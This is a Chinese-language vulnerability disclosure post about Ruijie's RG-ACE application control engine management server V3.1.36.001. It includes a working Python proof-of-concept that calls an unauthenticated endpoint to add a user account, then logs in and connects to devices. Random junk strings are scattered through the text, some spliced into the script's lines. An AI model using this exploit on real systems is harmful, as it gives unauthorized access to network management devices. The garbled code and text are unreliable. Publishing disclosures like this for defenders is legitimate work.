锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）


2 K* o# ]: f$ ^' S' C) R& |测试的具体版本是
产品名称: 锐捷应用控制引擎
* G) ^" \" _$ k% g, `版本号: 3.1.36.001 TC
编译时间: 201104291730
7 b1 y: l# Y3 m, L& e! R

漏洞证明：
0 }/ p) m3 ^9 _  C

0 R9 J' B# O0 O5 [2 D. T6 q

: D- }5 A! G4 B* |  J

% {3 |8 J5 ?. T执行脚本
#! /usr/bin/env python
( d/ y% R$ A0 ~) q0 o#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
9 w* \3 q* e' B/ a; I$ k4 U" h9 Y* G; Nurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
$ e9 |% H3 D& f) o) T7 _("userName","t"), #######账号自己加
  H+ H! W( r4 M("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
("email",""),
/ o# R) T. g$ P$ U3 |("mobilePhone",""),
, @' x# Y; y% K+ ]( S$ u2 j("officePhone",""),
# _# u9 n1 i1 y! Y( I1 T  y("addr",""),
- v3 I8 m6 J! {2 X# j  l: ?) M; [' H("submit","确定"))
" Q7 G6 x' A0 B' B9 ^$ e8 Rurllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
( R0 N+ L/ ]: m& m7 eprint "Done"

登录，连接设备

8 Z- l6 s& u) _* W
$ s# A" x7 N& K5 }& p' G5 S
2 A* P6 q) j5 p/ P9 i  z0 ~

; d8 u; Y# x9 a0 ~# u' p+ R8 Y默认的管理员admin权限更大点

( _% P1 w! z/ ]1 u
) f$ [/ p9 x4 Z" _/ m/ t
4 W. l: j! F8 z) D

( \( {. O5 ]4 J  ]2 `7 t5 J; H8 n' Y修复方案：
加强对接口的权限验证